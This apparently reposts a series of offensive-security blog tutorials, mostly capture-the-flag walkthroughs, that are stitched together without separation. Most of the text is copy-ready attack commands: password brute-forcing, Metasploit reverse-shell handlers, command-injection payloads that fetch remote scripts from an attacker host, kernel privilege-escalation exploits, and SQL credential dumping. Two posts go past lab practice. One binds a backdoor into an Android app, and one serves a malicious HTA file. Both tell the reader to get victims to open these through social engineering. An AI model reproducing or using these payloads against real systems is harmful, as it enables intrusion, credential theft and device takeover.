In previous practical I had used basic command to scan victim’s PC and found open ports like ftp, Ssh, telnet, snmp and etc. You can check from here.  But now the question is if we found open ports what else we can do to retrieve the information of victim using nmap scripts? To know your answer read ahead.

FTP BRUTE

Crack password using nmap brute script of FTP.

nmap -p21 –script ftp-brute.nse –script-args

userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105

From the scanning result I have successfully got the FTP password of victim pc

msfadmin:msfadminas username and password.

TELNET BRUTE

 Crack password using nmap brute script of telnet.

nmap -p23 –script telnet-brute.nse –script-args

userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105

I have successfully got the TELNET password of victim pc msfadmin:msfadminas username and password.

SMB BRUTE

Crack password using nmap brute script of SMB

Nmap –p445 –script smb-brute.nse –script-args

userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105

I have successfully got the SMB password of victim pc msfadmin:msfadmin and user:useras username and password.

 MYSQL BRUTE

Crack password using nmap brute script of MYSQL server

Nmap  -sT -p3306 –script mysql-brute.nse –script-args userdb=/root/Desktop/user.txt 192.168.1.105

Here I found two user as root and guest with empty password for MySQL server

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets.

The post Password Cracking using Nmap appeared first on Hacking Articles.

This time we are going to crack SickOS 1.1 in the Boot2root challenges. This CTF gives a clear analogy how hacking strategies can be performed on a network to compromise it in a safe environment. The objective being to compromise the network/machine and gain Administrative/root privileges on them.

WalkThrough

We will start off by finding the target.

 netdiscover

Our target IP is 192.168.0.101. Now we scan the IP by Nmap.

nmap –p- -A 192.168.0.101

The ports that we found open are 22, 3812 and 8080. Here, if you try to open the said VM in the browser then nothing will open and you will find nothing. So, now we will use nikto.

nikto –h 192.168.0.101:3128

Nikto will help us find a text file called Robots.txt. Let’s try and open it in the browser.

This tells us something about /wolfcms that means this website is made in Wolf CMS and/or there is a directory with the name of /wolfcms. Now we try and opened it on the browser but we failed. If you had have observed during nmap that there was something about proxy on 3128. So we will try and set up manual proxy. Give the IP of the VM in the HTTP Proxy and the port 3128

After the proxy has been set up open it in the website as the link: 192.168.0.101/wolfcms/

The page will open as above indicating that it has been made in Wolf CMS. I don’t know much about Wolf CMS so I searched google to know where admin page resides.

As I found the log in page through google, I opened it. And it was asking me for username and password. By default the username and password is admin and admin respectively.

I used the by default username and password and I logged in to the page shown below. Here, select files tab and then select upload files option.

Here, we need to upload the malicious file and to generate it open your terminal in kali and type :

 Msfvenom –p php/meterpreter/reverse_tcp lhost =192.168.0.103 lport=4444 –f raw

Copy the code from <?php to die(); and paste it to a text file with the extension .php. Upload the said file.

Now before running the file run multi/handler in metasploit by typing:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.103

set lport 4444

exploit

As you hit enter, run the file too and you will have your session and once you have it, go to the shell and type :

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

After doing the above, you will enter a user of our target and to know what files and directories are their type :

ls

Then read the config.php by typing :

Cat config.php

Reading th config.php file will give you all the details about the databse including username and password i.e root and john@123 respectively.

Moving further read the password file and to do so type :

cat etc/password

Observe all the user details it gives us and you will find that user sickos has the value of 1000:1000 that means that this is the first user. So, we might find ouor here as it is the first user. Therefore, switch user to sickos with the password john@123 that we found.

su sickos

Then type the following command to see the ID’s :

id

Now we need root access and for that type :

sudo –s

And give the password john@123 again. And to confirm that you have entered root type :

whoami

Futhermore we need to go into /root to look for the flag so for that run the set of following commands :

cd /root

ls

Here, you will find a text find. Let’s read it.

cat a0216ea4d51874464078c618298b1367.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post Hack the SickOS 1.1 VM (CTF Challenge) appeared first on Hacking Articles.

In this article we will learn yet another method hack android authentically. This is the most uncontrived way of hacking an android user as you are binding your maligant file with the original one just like we did with apk.

Firstly, we will download ccleaner from www.apk4fun.com as we will bind our payload file with it.

Our next step will be downloading the software is Spade. To download it go to the terminal in your Kali and type:

 git clone https://github.com/suraj-root/spade.git

The enactment of the above command with installs the software successfully. Next, type:

./spade.py /root/Desktop/ccleaner.apk

When you run the above command it will ask you the information about payload, lhost, lport. For payload select option 3 that means type 3. And the give lhost and lport :

Lhost > 192.168.0.104

Lport>4444

Previous rendition of the commands helps us bind an original file with our personalized malign file.

After it has all been done successfully, it will ask us to set the listener. Type’y’ here now a new apk will save in spade folder

Now, you can go ahead and send the victim the link so that he can download it.

As the victim will click on install, the application will start downloading along with our malicious file.

And when the application will be opened you will have victim session.

As you remember you typed ‘y’ before to create listener and the listener is created automatically on the all the details you had given previously. And then to simple have the session type:

sessions –i 1

The post Hack any Android Phone using Spade APK Backdoor appeared first on Hacking Articles.

“Your assignment is to pentest a company website, get root of the system and read the final flag” is the only thing we know about this VM other than that is it a smaller one. Therefore without any further ado lets starts by finding our target aka victim.

netdiscover

And now we will run nmap to determine what services are running.

So, the services that running is SSH on 22 ports, HTTP on 80 ports, IRC on 6667.

As port 80 is open that means we can open it in browser.

Now there is link on this webpage. Let’s open it and it will link to the following page.

In this webpage there are various tabs and I explored each tab including their page source and I found nothing except for the last tab i.e. Document. When you look into the page source there will be line saying “jabd0cs/ on the server. Just log in with guest/guest.”

So, I opened the directory and logged in with guest:guest as username:password respectively. And there was an upload option but there was a restriction that you can only upload .doc file so it was pretty useless.

If you observe the log in page there is a cms opendocman v1.2.7. this version of opendocman is vulnerable.

Let’s search metasploit for the exploits to be use against opendocman. And for that type:

searchsploit OpenDocMan 1.2.7

Above is the exploit’s detail. Now we will use sqlmap to find out database of usernames and passwords and for that type:

sqlmap –u ‘http://192.168.0.102/jaabcd0cs/ajax_udf.php?q=1&add_value=odm_user’ –dbs

The sqlmap command will show us all the tables in the database.

Including the username and passwords as shown below.

As you can see that the password is in MD5 hash value. We can crack it online no third party tool is needed. Simply go to www.md5decrypt.org

Password turns outs to be webmin1980 with the username of webmin. As we have username and password we can log in through SSH port. And to log in through SSH open a new terminal in kali anfd type:

ssh webmin@192.168.0.102

And then give the password when asked and you will have a session. Let’s check the version of kernel to see if it vulnerable or not.

lsb_release -a

The version is 14.04 that means it can be exploited and we only need to download its exploit from www.exploit-db.com

Type the following command to download it :

wget https://www.exploit-db.com/download/37292

As the exploit is downloaded, now as always we need to move it then compile it and then run it. And for that the set of commands is :

mv 37292 shell.c

gcc –o shell shell.c

./shell

And voila you have reached root but our challenge is not completed here. We still have to find the flag. Once you have reached root then go into the /root directory :

cd /root

Lets check what files and folders it is holding.

ls

And here you will a flag.txt. Read it!

cat flag.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post Hack the VulOS 1.1 VM (CTF Challenge) appeared first on Hacking Articles.

You are looking for two flags. Using discovered pointers in various elements of the running web application you can deduce the first flag (a downloadable file) which is required to find the second flag (a text file). Look, read and maybe even listen. You will need to use basic web application recon skills as well as some forensics to find both flags.

Level: Intermediate

You can download it from à https://www.vulnhub.com/entry/spydersec-challenge,128/#

Walkthrough

Let’s locate our target first.

netdiscover

Our target is 192.168.0.103. Now let’s fire up the nmap to know their services.

Nmap –A –p- 192.168.0.103

There are only two ports open i.e. 22 and 80 for SSH and HTTPS respectively. Next, I opened this page in browser.

There was nothing major on the page except for two images. There is a possibility about metadata behind these images. Therefore, I read these images with exif tool. One of the images which were saved by the name of “challenge” had a comment behind it. To read it type:

exiftool Challenge.png

If you observe closely the comment is in hexadecimal form. We need to convert it into readable form. No third party tool is required just go online to string-functions.com copy the string and paste it in the text box and then click the convert button.

After converting we again have hexadecimal string. No problem. Let’s convert it again as we did earlier.

This time we have base64 string. We convert it into non-cipher text by using HackBar. Paste the string and select Bsae64 decode option from the Encoding drop down menu.

Now finally we have a readable string. This can be a password or a directory. Note it down for future use. Moving on if you go through the source code of the page you will that evil function is quite unusual

I searched about eval function on google and found that it is a java script. There can be code hidden behind it. So let’s unpack it with the javascript unpacker.

After unpacking you will again come face to face with a hexadecimal string. Convert this string just like before.

After conversion the string became “alert(‘mulder.fbi);” .  I explored a lot and found a lot found nothing about it so decided to capture its cookies through BurpSuite. Now we are going to use Burpsuite that means we have to turn on manual proxy. And then turn on the interception on Burpsuite and then simply refresh the page and then with not much hard work cookies will be captured

In cookies I found a URI that means it’s a part of a link. Go to the params tab to see the proper link.

From here copy the link and open it in the browser.

Now when I opened it there was an error.  Then I explored a d bit and remembered that there was a mulder.fbi so I added that to the link.

After adding mulder.fbi to the link it asked me to download a file. Save it.

When you open the file that you just saved then it will play a video with different quotes. Now I was clueless about this so I started searching about it on google. And I found out that it was a truecrypt file. So to see what is hidden type:

python tcsteg2.py mulder.fbi

There was a whole drive hidden behind it. And using veracrypt you can see and open the drive.

When you open it will ask for a password and we have found the password beforehand. So give the password there.

Hence the drive will be unlcocked. Now open the drive. And you will find flag there.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post Hack the SpyderSec VM (CTF Challenge) appeared first on Hacking Articles.

This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell. When a user navigates to the HTA file they will be prompted by IE twice before the payload is executed

 Exploit Targets

Windows All Versions

Requirement

Attacker: kali Linux

Victim PC: Windows 10

Open Kali terminal type msfconsole

Now type use exploit/windows/misc/hta_server

msf exploit (hta_server)>set lhost 192.168.0.104

msf exploit (hta_server)>set srvhost 192.168.0.104

msf exploit (hta_server)>set payload windows/meterpreter/reverse_tcp

msf exploit (hta_server)>set lport 8443

msf exploit (hta_server)>exploit           

Send the link of the server to the victim via chat or email or any social engineering technique. 

When Victim Machine browsing to your link it will download anything.hta file when victim click on it you will get the meterpreter session

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

The post Hack Remote Windows 10 PC using HTA Web Server appeared first on Hacking Articles.

Whatportis is a utility command to search port numbers and/or names. It often happens that we need to find the default port number for a specific service, or what service is normally listening on a given port.

Many a times what happens is while running an nmap command, we encounter various ports whose information are missing or we couldn’t recognize the port. At that time, whatportis will be helpful.

To run the command, we first need to download the utility from github. To install whatportis from github, we type the following command:

pip install whatportis

If the dependencies of the utility are already installed on your pc, it will take less time to install; else the installation time will depend on your connection speed.

Once, the utility is installed, we can run the command, ‘whatportis’.

For example, I want to check what all port names are there for the port number 80, so I type:

whatportis 80

As we can see that all the port names associated with the port 80 is displayed on the screen.

Another example could be:

whatportis 3389

And whatportis displays 3389 successfully, which is a Microsoft WBT Server port.

Yet another example is:

whatportis 445

Where, 445 is a Microsoft-ds port. We can confirm the result on internet or consulting any good book.

Author: Harshit Rajpal is an InfoSec researcher and has a keen interest in technology. contact here

The post Search Port Names and Numbers using whatportis appeared first on Hacking Articles.

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands. Source:

https://www.owasp.org/index.php/Command_Injection

 First install the DVWA in your PC full article read here

Now open the DVWA in your pc and login with following credentials:

Username – admin

Password – password

Bypass Low Level Security

Click on DVWA Security and set Website Security Level low

Use “&&” in command injection to bypass low security of this server.

Go to the command execution page Enter an IP address and click on submit.

Now you can see the reply that tells us that we have establish a connection with the server. I have tried this numerous times just to be sure and so can you, therefore, whenever you will execute this cammand you will see the following :

We can also implement multiple commands simultaneously just by using & sign. For example next command is :

192.168.1.100 && dir

After the above command click on submit, performing the said command will itemize all directories and files.

We have found 4 directories and a file and also that path of the directory.

Next command is 192.168.1.100 && net user click on submit, this command will show the user’s list

Various commands are available which when submitted will give the intended outcome. So firstly, we will find a way to transfer our malevolent payload to the remote machine and for that I am using my favorite tool metasploit. To use metasploit al you have to do is type msfconsole in kali terminal and then type the following commands

 msf > use exploit/windows/misc/regsvr32_applocker_bypass_server

msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp

msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.106

msf exploit(regsvr32_applocker_bypass_server) > set lport  4444

msf exploit(regsvr32_applocker_bypass_server) > exploit

We can use the following command in order to open a port on the remote host and to connect back to it with metasploit.

192.168.1.100 && regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll and click on submit

Now you will get meterpreter session of victim’s PC. And type sysinfo to get system information.

Bypass Medium Level Security

Click on DVWA Security and set Website Security Level Medium

Use pipe “|” in command injection to bypass medium security of this server.

Follow same process as above using metasploit and further type :

192.168.1.100 | regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll and click on submit

Again we got meterpreter session 2

Bypass High Level Security

Click on DVWA Security and set Website Security Level High

Try to use pipe “||” in command injection to bypass high security of this server

Follow same process as above using metasploit

192.168.1.100 || regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll  and click on submit

Yes, we have got meterpreter session 3!!

Finally we have completed all three level low, medium, high in DVWA.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact Here

The post Command Injection Exploitation in DVWA using Metasploit (Bypass All Security) appeared first on Hacking Articles.

In this article we will learn about hacking Joomla CMS. And to so we will be a pre-instaled module of metasploit which will further help us to create an autocratic account with administrative privileges in Joomla versions 3.4.4 through 3.6.3. Ttherefore, if an email server is arranged in Joomla, an email will be sent to activate the account (the account is disabled by default).

 Exploit Targets

Joomla 3.4.4 through 3.6.3

Requirement

Attacker: kali Linux

Victim PC: Joomla 3.4.4

Open terminal in Kali and type msfconsole to start metasploit.

Once metasploit is opened then type the following commands to execute the attack:

use auxiliary/admin/http/joomla_registration_privsec

msf exploit (joomla_registration_privsec)>set rhost 192.168.0.103

msf exploit (joomla_registration_privsec)>set username raj

msf exploit (joomla_registration_privsec)>set password raj123

msf exploit (joomla_registration_privsec)>set email raj@hackingarticles.in

msf exploit (joomla_registration_privsec)>set targeturi /joomla

msf exploit (joomla_registration_privsec)>exploit 

Performing this attack will allow you to create a desirable username and password like in this case I have given username :  raj and password : raj123 along with email ID : raj@hackingarticles.in

In the image below you can see that a new user will be created by the username and passwords that you provided.

And as you have created a username you can log in using the said username.

Thus, you can hack Joomla CMS in the most simplest of the way.

The post Exploiting Joomla Website using Account Creation and Privilege Escalation appeared first on Hacking Articles.

People say that “good things take time” but everyone knows that in today’s world everyone has everything but time especially in cyber security and hacking. But worry no more about time as we are going to present the best and time saving method to hack any Linux server/machine through DirtyCow. This is the latest vulnerability that has been found that works against every version of kernel that has ever existed till date and researchers and attackers are taking it very seriously. It’s a nine year old bug but is only discovered now. And it has already begun to be used as leverage against the digital world.

DirtyCow is the latest exploit coined against every version of kernel in Linux. It got its name as “Cow” because it works on Copy-on-Write breakage. Kernel’s memory system works by handling Copy-On-Write breakage which contains private ROM. So basically this exploit helps us to escalate privileges by modifying existing setuid files.

Now I am going to walk you through the practical of DirtyCow by creating a normal user in my Kali and then I will be guiding you through the whole practical so stay with me. The vulnerability was discovered by security researcher Phil Oester, Link Here

Firstly make a new user in your kali by typing:

useradd –m raj

passwd raj

After running the above two commands it will ask you about password, here, give any password and repeat it.

Once your password is updated successfully and and user is created log into the Kali through that new user and then go to this link à https://github.com/gbonacini/CVE-2016-5195 and download the zip file.

After the downloading is done, open the zip file. Here you will find a folder; open that folder in the terminal. Now in the terminal will notice that you do not have administrative privileges and to confirm this just type:

id

After this lets check the list of directories in the folder and for that type:

ls

Futher, type:

make

And then run dcow file by typing:

./dcow

Executing the above command will show you the password. Copy this password and then type :

su

Then give the same password that you copied when asked.

And VOILA!!! You have the access to the root!!

Conclusion: Using this we are modifying Copy-On-Write cache in kernel. By modifying we are changing contents of any readable and mapable file. It can alter any file but that changes affect cache memory only that means after rebooting the changes will be back to normal. Hence, letting us have the access to root.

The post Hack Linux Kernel using Dirtycow Exploit (Privilege Escalation) appeared first on Hacking Articles.

Today we going to solve Kioptrix: Level 1.3 (#4). It is Boot2Root series provided for practice. Hints we have from author are :

• It’s possible to remotely compromise the machine
• Stays within the target audience of this site
• Must be “realistic” (well kinda…)
• Should serve as a refresher for me. Be it PHP or MySQL usage etc.

So basically, its security level is from beginner to intermediate. Lets try to break through it. But before please note that you can download it from à https://www.vulnhub.com/entry/kioptrix-level-13-4,25/

WalkThrough

As always start off by finding the target.

netdiscover

And so our target is 192.168.0.101. We will now scan it via nmap.

nmap –p- -A 192.168.0.101

With the result of nmap you can see that service of HTTP is running on two ports i.e. 80 and 8080 along with the service of SSH on 22 port. As we have HTTP service running we should try and open it in our browser.

There is nothing on the webpage except it says “it works!”, let’s have a look on its source code.

In its source code there is URL mentioned i.e. pChart2.1.3/index.php. Open this URL.

And so the ULR opens an it takes us to php library. pChart is basically PHP library that helps us to create or manage anti-aliased charts or pictures directly from the web-server. I searched google more to learn about it and stumbled upon some useful information i.e. this version of pCharts was vulnerable. Therefore, I  searched for its exploit on exploit-db.com.

And so I found an appropriate exploit. When you explore the exploit there is a link given :

hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

I opened this link except I used the VM’s IP and found the following page :

The information on this page isn’t useful at all. Then I remembered that http service was opened on 8080 port too. So I opened the IP on the port 8080.

But the access was forbidden. I tried to very method to bypass this forbidden access but nothing worked other than user agent. So to access this page go to Tools menu from the menu bar. A drop down menu will appear. From this menu select Default User Agent. Another menu will open and from this select Internet Explorer, from this another menu will open and from it select Internet Explorer 6.

And fortunately we have the access to the page. And found file called phptax/

Now open this link and you will have the following page :

The page was of phptax. Phptax is a kind of CMS for linux. Its aim is to develop a tax program which uses databaseless methodology that fits in one line text files. Using the Phptax does not requires SQL databases that are generally used in this program. And to our luck there a exploit of Phptax in metsapsloit, for that simply type search phptax  in metasploit.

To use this exploit simply type the following in metasploit :

use exploit/multi/http/phptax_exec

set rhost 192.168.0.101

set rport 8080

exploit

After this, you wil directly reach the shell then type :

id

uname -a         

These above commands are used to know the id and the version of Kernel.

There is a exploit for this version of kernel in exploit-db.com. Download it and save the file as shown :

Next, type the following command to get the exploit from its by default location :

fetch http://192.168.0.104/28818.c

Here, we used fetch command because wget command wasn’t working as its security level here was a bit high. So, using fetch is an substitute for wget command and so we are directly using it from the browser.

Then type the following set of commands to execute the exploit :

ls

gcc –o 28718.c kernel

ls

chmod 777 exploit

./exploit

As the exploit executes you will reach the root. And to confirm this type :

id

Then moving forward go to the root folder by typing :

cd /root

Let’s see what directories it has and for that type :

ls

Here we have a congrats.txt named text file and I am hoping this will be our flag so to read it type :

cat congrats.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post Hack the Kioptrix VM (CTF Challenge) appeared first on Hacking Articles.

The name of the Virtual machine is “Acid Server” that we are going to crack.  It is an Boot2Root Vm that we are going to solve. This is a web-based VM. Our main goal is to escalate the privileges to root and capture the flag.

You can download it from à https://www.vulnhub.com/entry/acid-server,125/

WalkThrough

As always start by finding the target.

netdiscover

Our target is 192.168.0.105. Now fire up nmap to scan the ports.

nmap –p- -A 192.168.0.105

Nmap results in showing that there is only one port open i.e. 33447 with the services of HTTP. Please observe here that port 80 is not open that means if we want to open this IP in the browser then we have to use the port number as it will not open it by default. So now open the web page using the port number.

There is only a heading and a quote on the page; nothing else but if you look at the tab on the browser, it says “/Challenge”. This can be a directory. Let’s open it.

Upon opening /Challenge, a log in portal will open. Let’s learn more about /Challenge by using DirBuster. Copy the link from the browser in Target URL box and then select 2.3-meduim word list in Files with the list of dirs/files box by clicking on browse button. And then click on Start.

Clicking on start button will provide the list of directories.

I went through every directory but only cake.php was useful. Open it in the browser. When you open cake.php, the page says “ah.haan…There is long way to go..dude J”. But upon looking closely you will find the /Magic_Box is written on the tab. Lets open it in the URL just like before.

When you open the /Magic_Box it says that access to the page is forbidden. OK! There is no problem in that. Let’s use DirBuster on it. Give the URL and 2.3 meduim wordlist just as before and then click on start button.

In the result it will show the name of the directories.

Out of all those command.php is the only one that has proved to be useful. Open it in the URL.

Here you will find a ping portal that means you can ping any IP address from here. Let’s try and ping an IP. (You can ping any IP but I am going to ping the default IP i.e. 127.0.0.1).

Once the ip has been pinged, go to the page source. On the page source you can contemplate that results of ping is showing.

If the page is showing the result that means we can use this portal to inject our virus using web_delivery exploit. And to do so, go to the terminal of Kali an open metasploit by typing msfconsole and then further type :

use exploit/multi/script/web_delivery

set target 1

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.104

set lport 4444

exploit

This exploit is a multi exploit that means it can used on multiple programs. Therefore, I have set the target as one because 1 refers to php and as we are using php payload we have to set target as 1.

Now performing this exploit will give you a code. Copy this code and paste it on ping portal after the IP that you are using to ping. And to add this code use semi-colon (;).

127.0.0.1; *<code>*

As soon as you click on submit, you will have a meterpreter session in metasploit. When you have the session the type the following commands to reach terminal:

shell

python –c ‘import pty; pty.spwan(“/bin/bash”)’

Further type the following command to see the list of directories:

ls / l

In the list you will find a directory called s.bin. let’s go into the folder and see its list of files and for that type :

cd /s.bin

ls

Here, you will find a php file. Lets read it.

cat invesgitate.php

When you read it, it shows you a message i.e. “now you have to behave like n investigator to catch the culprit”.

In the list of directory that was previously previewed also had a folder sbin. Let’s get into that folder and see the lists of files and to do so type:

cd sbin

ls

In the list of files you can see a file named raw_vs_isi. Let’s check it out.

cd raw_vs_isi

ls

It contains only on file, called hint.pcapng. This is wireshark file and there are many ways to download this file but they are usually very lengthy. So I have used a shortcut. Simply terminate your shell session and go back to meterpreter session

There check where you are currently working and for that type:

pwd

ls

And then type:

Download hint.pcapng /root/Desktop/hint.pcapng

Now the file is downloaded on your desktop. I explored it every packet and found a conversation in the TCP stream of 90^th packet. Just right click on the said packet and then click on Follow option and then select TCP stream.

It will open the conversation as shown in the image below:

In the conversation on eof them says “saman and now a days he’s known by the alias of 1337hax0r” that means saman is the usernam and 1337hax0r can be the password. Let’s try it. Type shell again to reach the terminal and here log in with the username we just found:

su saman

1337hax0r

Sudo saman

1337haxor

And so you have entered the root. Now go into the folder root and see what it has to offer:

cd /root

ls

cat flag.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post Hack the Acid VM (CTF Challenge) appeared first on Hacking Articles.

This is another Boot2Root challenge which has been prepared by KoocSec for hacking exercises. He prepared this through the inspiration of his OSCP exam. It is based on the concepts of great novel-turned-movie The Lord Of The Ring.

You can download this VM from –> https://www.vulnhub.com/entry/lord-of-the-root-101,129/

WalkThrough

Firstly, we will find our target.

netdiscover

Our target is 192.168.1.5

Now run the nmap script to know the ports and protocols.

nmap –p- -A 192.168.1.5

Nmap has resulted in showing us that only 22 port is open with the service of SSH. Port 80 is not open that means we don’t have facility of opening this server in browser. Therefore we will try to see what port 22 has to offer and so go to your terminal in Kali and type :

ssh 192.168.1.5

When I searched SSH it said “Knock Friend To Enter” and “Easy as 123” and then it asks for password that we do not know yet. Now this is a hinting towards port knocking. Let’s try it :

nmap –r –Pn –p 1,2,3 192.168.1.5

Here,

-r à is scanning ports consecutively

-Pn à is treating all hosts as online

-p à is only scanning specified ports

1,2,3 à ports (we used this because of the : easy as 1,2,3)

Now again fire up nmap scan. This time hopefully we will have more than one port in result.

nmap –p- -A 192.168.1.5

As you can see there is one more port open in comparison to our previous scan i.e. 1337 which has the service of HTTP and this is all we wanted as by default port 80 was not open. Let’s open our target IP with this port.

192.168.1.5:1337

It opens a page with only one image. There was nothing in the page source too. So, I used nikto here.

nikto –h 192.168.1.5:1337

Every directory shown in nikto’s result wasn’t useful. So, I tried robots.txt as I always try it by default.

And BOOM! I was right as an image opens here. And further I checked its page source.

In the page source I found a Base64 code which I decoded using HackBar.

And it gave me the result as shown above but here is a trick. It is going to be further decoded but only from L till = as this is the base64 coded string. Similarly, decode it further.

Upon decoding we have a URL. Lets open it.

And now we are face to face with a log in portal. Now here I will try to log in with any random username and password but I this process we will also capture cookies via BurpSuite.

As the cookies are captured, we will use them in our next step i.e. sqlmap. Now I wanted to gather database to know username and password that is why I decide to use sqlmap. And the command I used is :

sqlmap -u http://192.168.1.5:1337/978345210/index.php –forms –batch –crawl=10 –cookie=ibf29bpuc0864gmfobpdsg0pu0 –level=5 –risk=3 –dbs

When you execute this command it will ask you three questions. Answer first two questions as no and the third one as yes.

And it will start gathering database.

And finally it will show you the database of usernames and passwords.

Moving on save all of these usernames and password in two different text files. And use this text files in an SSH log in attack with the help of Brute force method. And to execute this attack go to the terminal in Kali and open Metasploit by typing msfconsole and further type :

use auxiliary/scanner/sh/shh_login

set rhosts 192.168.1.5

set user_file /root/Desktop/user

set pass_file /root/Desktop/pass

exploit

And as a result it will show you the correct username and password i.e. smeagol:MyPreciousR00t. now log in through SSH using this username and password.

ssh smeagol@192.168.1.5

Next give the password when asked. And when you are logged in then type the following command to know version of kernel.

lsb_release -a

The version is 14.04 and luckily we have an exploit for this version. In the Kali terminal lets search for the appropriate exploit and for this type :

searchsploit ubuntu 14.04

The exploit we will use here is 39166.c and for this exploit to be used we need to first download and compile it and for this type :

wget http://192.168.1.18/39166.c

gcc 39166.c –o shell

The first command in the above commands will download the exploit and the second one will compile it and save it in the file named shell. Next, we have to give permission to the shell and then at last we have to run it.

chmod 777 shell

./shell

Executing the shell file will take you to the root and to confirm this use the following command :

whoami

Now let’s get into root folder and see what it has to offer :

cd /root

ls

Here, we have found a text file with the name flag which was our ultimate goal. So now no more waiting, lets read it.

cat Flag.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post Hack the Lord of the Root VM (CTF Challenge) appeared first on Hacking Articles.

Breach 2.1 is the second VM in the multi-series Boot2Root CTF challenges. This is developed by mrb3n. It is high-level challenge and shows a lot of scenario including plenty of twists and trolls along the way. It works on a static IP i.e 192.168.110.151 therefore we have configured our adapter to be a host-only adapter.

You can download it from: https://www.vulnhub.com/entry/breach-21,159/

WalkThrough

As our VM is hosted on static IP, there is no need to discover our target we will directly start by scanning our target.

nmap –p- -A 192.168.110.131

Nmap shows us that only three ports are open which are: 111, 52263, 65535 with the services of rpbind, status, SSH respectively. Let’s check SSH port.

ssh 192.168.110.151 –p 65535

Here,

-p = a specified port

Here I gave password “inthesource” because in the area between the hashes it says “Peter, if that’s you – the passowrd is in the source”. It did not work though.  LOL! So I just gave nmap another try and there was port 80 open this time.

Ssh peter@192.168.110.151 –p 65535

As the port 80 just opened, to our luck we can open this in our browser now.

Now on the webpage it says “Welcome to Initech Cyber consulting. LLC” and something about BEEF. Even in the page source I found nothing so I decided to use DirBuster. It showed me a lot of directories but the one that stole my interest was /blog/.

So I opened it in the browser. It opened a travel blog. There was a search box on the blog so I tried SQL injection by using single inverted comma (‘).

This way I found SQL vulnerability so I used SQLMap next.

Sqlmap –u http://192.168.110.151/blog/index.php?search  –dbs

This command will start the process and it will show you five table names in database.

Out of these five oscommerce is the most famous CMS of e-commerce websites. And this blog was also related to commerce. So I decided to use my next SQLMap command against this table in databse.

Sql –u http://192.168.110.151/blog/index.php?search= –dbs –D oscommerce –tables –dump

Execution of this command will give you username and password. The username is admin but the password that you will receive will be MD5 hash value.

You can crack this MD5 hash value using any third party or you can use an online method like I did.

Upon cracking the password you will get here is 32admin. Now I have usernames and password but I do not have a log in portal. So I started exploring the blog but couldn’t find anything. So cooped and pasted it copyright information on google.

And upon search the goggle I found the first link of exploit-db.com that means there is an exploit for the said. And that’s why I opened the linked and explored it.

In the exploit there was information about XSS code and a link was provided. Now I know that BEEF does XSS work and on the very first webpage too there was something about BEEF. So naturally I started working with BEEF.

Now BEEF automatically gives us a script which includes a link. I copied that link and opened the BEEF panel in the browser.

Here, go to register option and paste the copied link in the username area and give and random password and email.

As you can see BEEF will give you a session.

From the entire cross sitting details BEEF have to show please pay close attention to the browser. You will find that our target is using FireFox 15.0 and fortunately there is an exploit for this in metasploit.

Now, open metasploit and type the following command to use the said expoit :

use exploit/multi/browser/firefox-proto_crmfrequest

set paypload generic/shell_reverse_tcp

set srvhost 192.168.110.128

set uripath shell

set lhost 192.168.110.128

exploit

Performing this exploit will give you and URL like in my case URL is http://192.168.100.128:4444:8080/shell. Copy this link and go to the BEEF panel. In the BEEF panel go to the Commands tab > Hooked Domain > Redirect Browser. Paste the copied link here in the Redirect URL text box.

As you follow the above steps you will have a shell session.

Now here is trick, you will lose the session as you as you will get it. Here you will have to transfer you shell session to meterpreter session within 5 seconds and for that type :

use post/multi/manage/shell_to_remember

set session 1

run

And you will have a session. Open that session and you will reach the terminal. In the terminal lets check out the home folder.

cd /home

ls

In the home folder you will three folders i.e. bill, milton, peter. It was not of much use so went ahead and and checked network status.

netstat -tln

Checking the network status gave me some co-ordinates. So I checked them on Google map and found that it was the co-ordinates of Houston. Now this Houston word can be a password or username so I just made a mental note of it for later use.

Except this I found nothing so used Telnet to just get a reply and for that u sed the following comand :

telnet 127.0.0.1 2323

This time it replied with a question i.e. whose stapler is it? Now I don’t know the answer so I just pressed enter. So to know the answer I wanted to search Milton user. And for this, commands are:

find /usr –user milton

cat /usr/local/bin/cd.py

Now in the python file it showed me the programming and as you can see in the image you the coding shows that correct answer “mine”.

So, I repeated my steps to reach the same question. And gave the answer as mine.

Then I checked status of network and observed that port 8888 opened.

I checked this port in browser and found two directories.

Out of these I opened oscommerce link and the following page opened.

I had the username and password for this CMS so I Google its admin page and logged in with the admin as username and admin as password.

